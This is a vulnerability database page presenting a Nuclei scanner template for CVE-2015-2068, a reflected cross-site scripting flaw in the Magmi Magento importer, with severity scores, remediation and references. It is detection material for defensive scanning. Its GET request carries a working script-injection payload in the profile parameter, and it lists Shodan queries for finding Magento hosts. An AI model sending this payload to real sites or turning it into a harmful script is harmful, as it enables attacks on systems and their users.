Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2015-2068
HistoryOct 11, 2021 - 11:28 a.m.

Magento Server Mass Importer - Cross-Site Scripting

2021-10-1111:28:08
ProjectDiscovery
github.com
1

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6 Medium

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

50.8%

Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.

id: CVE-2015-2068

info:
  name: Magento Server Mass Importer - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: Magento Server Mass Importer plugin contains multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via the (1) profile parameter to web/magmi.php or (2) QUERY_STRING to web/magmi_import_run.php.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected Magento server.
  remediation: |
    Apply the latest security patches provided by Magento to fix the XSS vulnerability in the Server Mass Importer module.
  reference:
    - https://www.exploit-db.com/exploits/35996
    - http://packetstormsecurity.com/files/130250/Magento-Server-MAGMI-Cross-Site-Scripting-Local-File-Inclusion.html
    - https://nvd.nist.gov/vuln/detail/CVE-2015-2068
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2015-2068
    cwe-id: CWE-79
    epss-score: 0.00146
    epss-percentile: 0.50455
    cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: magmi_project
    product: magmi
    framework: magento_server
    shodan-query:
      - http.component:"Magento"
      - http.component:"magento"
  tags: cve2015,cve,plugin,edb,packetstorm,magento,magmi,xss,magmi_project,magento_server

http:
  - method: GET
    path:
      - '{{BaseURL}}/magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><script>alert(document.domain)</script>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009d726a8c4ca8fa63005a0a480346dd8c428fb8fc1d9d9015a9b6d140e0ab7c73022039d9def8ad4d1f2504466366c3119bf4d261ca81f8f43d41557090180788167a:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6 Medium

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

50.8%